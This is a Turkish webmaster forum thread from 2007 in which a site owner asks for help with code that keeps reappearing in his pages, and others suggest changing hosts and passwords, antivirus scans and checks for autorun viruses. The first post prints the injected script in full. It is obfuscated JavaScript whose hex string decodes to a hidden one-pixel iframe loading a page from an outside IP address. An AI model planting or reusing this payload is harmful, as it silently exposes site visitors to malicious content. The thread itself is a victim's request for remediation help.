|
|
12-11-2007, 23:38:24
|
|||
|
|||
Kaynak kod değiştiren trojan
Merhaba arkadaşlar;
Web sitemde bir çeşit virüs var ve web sayfalarımın kodlarına kendisini ekliyor. Eklediği kod: <!-- o65 --><script type="text/javascript"> function E4C91FB26400DB2E8E6D1A43F8(E24F89741580A88A1){func tion B7BF85150AC30DBA42(){return 16;}return(parseInt(E24F89741580A88A1,B7BF85150AC3 0DBA42()));}function E34AB0D7708CB83225AC60547C769(A558AE9C2D9A9BCFF8A1 36E3D631DD2){var B23FC86F17B841112="";for(C39BD7887D5CF0A0869467393 D621AF=0;C39BD7887D5CF0A0869467393D621AF<A558AE9C2 D9A9BCFF8A136E3D631DD2.length;C39BD7887D5CF0A08694 67393D621AF+=2){B23FC86F17B841112+=(String.fromCha rCode(E4C91FB26400DB2E8E6D1A43F8(A558AE9C2D9A9BCFF 8A136E3D631DD2.substr(C39BD7887D5CF0A0869467393D62 1AF,2))));}document.write(B23FC86F17B841112);}E34A B0D7708CB83225AC60547C769("3C696672616D65207372633 D27687474703A2F2F35382E36352E3233332E39372F666F727 56D2F6F75742E706870272077696474683D273127206865696 768743D273127207374796C653D27646973706C61793A20686 96464656E3B273E3C2F696672616D653E"); </script><!-- c65 --> Bu kodu index, default, login vb. sayfalara atıyor. Php, asp, html olması farketmiyor. Bu olaydan sonra veri tabanlarımı sildim, hostumun içindeki dosyaları sildim ve bilgisayarıma fdisk attım. Şu anda web sitemde basit bir index.html var ve aynı şey tekrar oldu. O kod yine kendisini kaynak kodların arasına ekledi ve sayfanın düzgün çalışmasını engelliyor. Lütfen yardım edin, ne yapmalıyım. Hosting firmamla konuştum ve sunucularımızda virüs olma ihtimali yok diyorlar. 
|
|
13-11-2007, 06:29:28
|
||||
|
||||
|
Cevap: Kaynak kod değiştiren trojan
arkadaşım bir başka sunucuya geçmeni tavsiye ederim fdisk attıktan sonra bile hala varsa bu sunucudadır büyük ihtimal
|
|
13-11-2007, 08:50:10
|
|||
|
|||
|
Cevap: Kaynak kod değiştiren trojan
bir yerlere ftp bilgilerini yolladı ise, ordan tekrar otomatik olarak ordan işlem yapmış olabilir.
__________________
Yüz Verip Adam Ettiysem 0 ile Çarpıp Yok Etmesinide Bilirim
|
|
13-11-2007, 11:36:21
|
|||
|
|||
|
Cevap: Kaynak kod değiştiren trojan
Valla arkadaşlar önceden hostum türkticaretteydi sonra natro ya aldım artık host değiştirmekten bıktım aslında, bir de ftp bilgilerini değiştireyim belkide o yüzden olabilir denemekte fayda var. Her türlü tavsiyeye açığım arkadaşlar
|
|
13-11-2007, 11:57:34
|
||||
|
||||
|
Cevap: Kaynak kod değiştiren trojan
bi ara benim ilgilendiğim bi siteye de aynı kod index'i yazılmıştı ben bi kere sildim hiç bilgisayarıma filan da format atmadım düzeldi bi daha girmedi o kod index'e
bence bi hosting şirketine sor... Konu KaraSancak tarafından (13-11-2007 Saat 12:05:58 ) değiştirilmiştir..
|
|
14-11-2007, 22:53:35
|
|||
|
|||
|
Cevap: Kaynak kod değiştiren trojan
Arkadaşlar hosting yetkilileriyle en son görüşmemde hostumun bulunduğu sunucudaki bütün dosyaların incelendiğini ve benimkine benzer bir sorunun olmadığını söylediler. Tavsiye olarakta hosttaki dosyaları sildikten sonra bilgisayarıma format atmamı ve mail şifremi, kullanıcı şifremi, ftp şifremi, vb. şüphelendiğim bir şifre varsa ya da mümkünse hepsimi değiştirme mi tavsiye ettiler. Sanırım biraz devrik bir cümle oldu ama anlaşılıyordur. Herhangi bir şekilde şifreleriniz başkalarına geçmiş olabilir denildi şimdi de bu yöntemi deniyeceğim bakalım ne olacak.
|
|
15-11-2007, 15:19:11
|
|||
|
|||
|
Cevap: Kaynak kod değiştiren trojan
Arkadaşlar...
Öncelikle şu soruyu sorayım.. Bu kaynak koddaki değişiklik explorer açarak girdiğiniz tüm sayfalarda mı var? Yoksa sadece host ettiğiniz yerle mi ilgili?? Yakın bir zamanda buna benzer bir virus çıkmıştı ve girdiğiniz her web sayfasının en başına JS kodu ekliyordu. Bu tarz bir şey olmasın? Öncelikle buna dikkat edin. Ben böyle bir uygulama olduğunu tahmin ediyorum. Ama diyorsanız ki sadece host ettiğim sayfalarda bunu görüyorum. Evet hosting ile sıkıntınız var demektir. Birde hosting olarak windows ta mısınız? Unix/Linux temisiniz? Yine tahminim Windows olacaktır
__________________
Örnek Kodlar ve Örnek Kod Paylaşım Sitesi
|
|
16-11-2007, 23:09:42
|
|||
|
|||
|
Cevap: Kaynak kod değiştiren trojan
Eğer sunucuda problem yoksa (büyük ihtimalle yoktur) ve format attığında trojan veya benzeri program hala bilgisayarında kalıyor ise kullandığın tüm usb aygıtlarına mp3 playerlar flash bellekler yani tüm veri depolama araçlarına onları hiç açmadan format at. Bir autorun virüsü olabilir. Bu virüslerin autorun ile yayılan bir çok çeşidi mevcut. Bir de kendini exe dosyaları ile değiştirenleri var. Yine bir yere yedek aldıysanız setup dosyalarının (cd-dvd vs.) viruslu halini kopyalamış olabilirsiniz. Onları da kullanmamanızı tavsiye ederim.
|
|
16-11-2007, 23:21:32
|
||||
|
||||
|
Cevap: Kaynak kod değiştiren trojan
Kimse söylememiş bari ben söyliyim,
Makinene adam gibi bir antivirüs kurduktan sonra virüs taraması yaptır. Ondan sonra serverındaki dosyaları tek bir klasör altında toplayıp bir de onları tararsanız en azından ne virüsü olduğunu bulabilirsiniz. Ondan sonra da artık varsa temiz yedeklerinizi yüklersiniz yeniden servera. Servera temiz olarak yolladıgınız bir dosyayı makinenize indirmek istediğinizde virüslü dosya geliyorsa o zaman serverda sorun var demektir 
|
 |
| Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| Seçenekler | |
| Stil | |
|
|
Benzer Konular
|
||||
| Konu | Konuyu Başlatan | Forum | Cevaplar | Son Mesaj |
| kaynak kodu şifreleme | ibrahimd | Webmaster Genel | 17 | 28-08-2007 22:44:35 |
| Dünyayı değiştiren 15 adres | Murky | Teknoloji & Bilişim | 0 | 25-06-2007 10:30:07 |
| Buna NE Diyeyim Bilmiyorum TROJAN | Linux | Webmaster Genel | 5 | 23-03-2007 17:14:41 |
| Pascal'da sürekli renk değiştiren yazı | Alone | Programlama Dilleri | 0 | 24-02-2007 11:42:55 |
Cevap: Kaynak kod değiştiren trojan
Normal
